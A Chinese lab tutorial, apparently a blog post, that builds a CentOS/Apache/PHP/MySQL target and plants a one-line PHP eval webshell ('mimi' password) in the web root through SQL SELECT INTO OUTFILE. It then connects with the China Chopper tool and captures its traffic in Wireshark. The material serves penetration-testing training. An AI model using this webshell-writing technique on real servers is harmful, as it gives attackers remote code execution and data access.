目录

  • 1.搭建靶机环境
    • (1)实验环境及思路
    • (2)搭建靶机环境
  • 2.用Navicat构建一句话SQL注入木马
  • 3.通过菜刀连接靶机

1.搭建靶机环境

(1)实验环境及思路

靶机:centos7 以安装好MySQL服务
攻击机:win7
使用工具:Navicat、wireshark、菜刀

(2)搭建靶机环境

  • (1)firewall-cmd --zone=public --add-port=80/tcp --permanent 开80端口

  • systemctl restart firewalld.service 重启防火墙

  • 确保已安装好MySQL

  • (2)rpm -ivh mysql-community-libs-compat-5.7.30-1.el7.x86_64.rpm安装php所需要的依赖环境

  • (3)yum install php php-mysql -yyum安装php

  • (4)yum -y install httpd*为其安装Apache服务

  • (5)vi /etc/httpd/conf/httpd.conf修改apache配置文件

  • 在配置文件中修改如下,添加如下内容

  • AddType application/x-httpd-php-source .phps——apache能过够解析phps文件

  • AddType application/x-httpd-php .php——apache能过够解析php文件

  • (6)cd /var/www/html apache网站的根目录

  • vi phpinfo.php

  • <? php phpinfo(); ?>编写php文件,配置php网站,这是条php语句

  • systemctl restart httpd重启apache服务

  • (6)localhost/phpinfo.phpfirefox中输入可以访问代表网站服务搭建成功

2.用Navicat构建一句话SQL注入木马

show databases;
create database TEST;
use TEST;
show tables;
create table muma(cmd text);
insert into muma values(concat('<?php @eval($_POST[','"','mimi','"',']); ?>'));
select * from muma;
select * from muma into outfile '/var/www/html/ma.php'

3.通过菜刀连接靶机

  • cd /var/www/html

  • ifconfig查看靶机IP
  • 使用win7上的菜刀工具进行连接

  • 双击进入,可以看到我们已经成功进入到靶机的数据库中
  • 我们可以用Wireshark来抓取菜刀的流量包,靶机记得开启apache服务
  • systemctl start httpd
  • 启用wireshark,然后用菜刀访问我们所写入的木马文件ma.php
  • wireshark启用流量过滤,方便我们找到菜刀的流量包
  • ip.addr == 192.168.8.141 and http

    在这里插入图片描述

一句话木马SQL注入相关推荐

  1. 第一次sql注入的教训与思考

    sql注入实验 靶场在云演课堂web安全入门sql注入第一节 这课程排的我也不知道啥是sql注入,啥是文件上传漏洞了 文章目录 sql注入实验 sql注入是如何发生的 假设 从服务端代码入手 show ...

  2. 渗透测试SQL注入——Sqlilabs关卡详解

    目录 报错函数floor的利用 利用select into outfile写一句话木马 利用load_file 读敏感文件 利用sqlmap探测 sql盲注 get基于时间的盲注应用 post基于时间 ...

  3. SQL注入上传一句话木马

    利用sql注入上传一句话木马 导读 1. sql注入的危害 2. 文件写入 2.1 webshell.一句话木马.后门 webshell(大马) 一句话木马 木马文件的危害 2.2 文件写入的前提条件 ...

  4. php mysql 注入一句话木马_渗透技术--SQL注入写一句话木马原理

    讲一下SQL注入中写一句话拿webshell的原理,主要使用的是 SELECT ... INTO OUTFILE 这个语句,下面是一个语句的例子: SELECT * INTO OUTFILE 'C:\ ...

  5. 后台登录密码绕过+sql注入+一句话木马 实验演示(盾灵)

    环境 Windows Server 2008(虚拟机)   安装phpStudy,安装dunling 盾灵投稿系统 dunling是一个CMS在线内容管理器 dirb是Kali内置的一个基于字典的We ...

  6. sql注入与一句话木马

    0x00 sql注入之一句话木马 首先介绍一下一句话木马: 一句话木马是一种基于 B/S结构的简短脚本,通过这个脚本,执行POST来的任意参数语句,可以提交任意内容,黑客借此进行SQL注入或拿到SHE ...

  7. SQL注入一句话木马(load_file/out file)

    工具 靶机--metasploitable2 环境--DVWA,(low等级下) 菜刀--蚁剑 权限查看 查看mysql是否有对函数load_file(),outfile()函数的限制 (secure ...

  8. 全网最详细的渗透测试靶机实操步骤——vulnhub靶机实战(七)IMF【包含了sql注入,文件上传,gif图片木马制作,缓冲区溢出漏洞sploit等诸多知识点的靶机,超多干货】

    靶机地址:https://www.vulnhub.com/entry/imf-1,162/ 靶机难度:中级(CTF) 靶机发布日期:2016年10月30日 靶机描述:欢迎使用" IMF&qu ...

  9. bt5制作php木马,Bt5的sql注入实例

    版权声明:转载原创文章请以超链接形式请注明原文章出处,尊重作者,尊重原创! 恰饭广告 任务描述: 了解sql注入方法P170 任务环境说明: 攻击机:BT5 靶机:WEB服务器 攻击机安装服务/工具1 ...

最新文章

  1. HttpServletResponse 的 sendError( )方法以及常用的HttpServletResponse常量级错误代码
  2. rhel 5 检测软件awstats,cacti,ntop搭建
  3. 面试:Java 到底是值传递还是引用传递?
  4. STM32通过串口如何接收服务器发来的数据
  5. new uk psw policy
  6. VTK:模型之SmoothDiscreteMarchingCubes
  7. 随机发牌_用Python制作4人扑克牌发牌游戏
  8. django-模型类中的数据类型-添加中
  9. Android 8.0 学习(4)---Android通用内核
  10. linux tcp 服务器 c,Linux网络编程篇之Tcp协议介绍, C/S通信及聊天室实现
  11. 经纬张颖「炮轰」扫码点餐;淘宝特价版给拼多多送芒果;Firefox 87.0 发布|极客头条...
  12. matlab求临界稳定时的k,MATLAB自动控制原理仿真
  13. 收藏!Tengine问题排查必备
  14. 读《图解TCPIP》
  15. windows C盘瘦身
  16. 运维工程师的打怪升级之路
  17. 我深夜用 Python 跑神经网络,只为关掉台灯!
  18. 驾驶证北京到期满换证  异地期满换领  异地驾驶证到期在北京换证 驾驶证异地换证
  19. 谈的话马上得到了聚众传媒创始人虞峰、博客中国创始人方兴东及携程网创始人之一的季琦等三位嘉宾的一致响应
  20. python bunch制作可导入数据_Python 之 Bunch Pattern

热门文章

  1. bash之波浪号扩展(tilde expansion)
  2. LoadingCache使用
  3. java从入门到精通学习路线
  4. 搬砖工php什么意思,醒工砖是什么意思什么梗 醒工砖是醒醒工头喊你起来搬砖的意思...
  5. Cannot nest 'PRJ/src/main/resource' inside 'PRJ/src'. To enable the nesting exclude 'main/' from 'PR
  6. 风控建模七:拒绝推断
  7. 老鱼Python数据分析——篇九:项目重构(代码)
  8. 文心一言 VS 讯飞星火 VS chatgpt (27)-- 算法导论5.1 2题
  9. ntp服务器无响应,NTP服务
  10. android bionic log打印,如何让android的bionic中的linker输出调试信息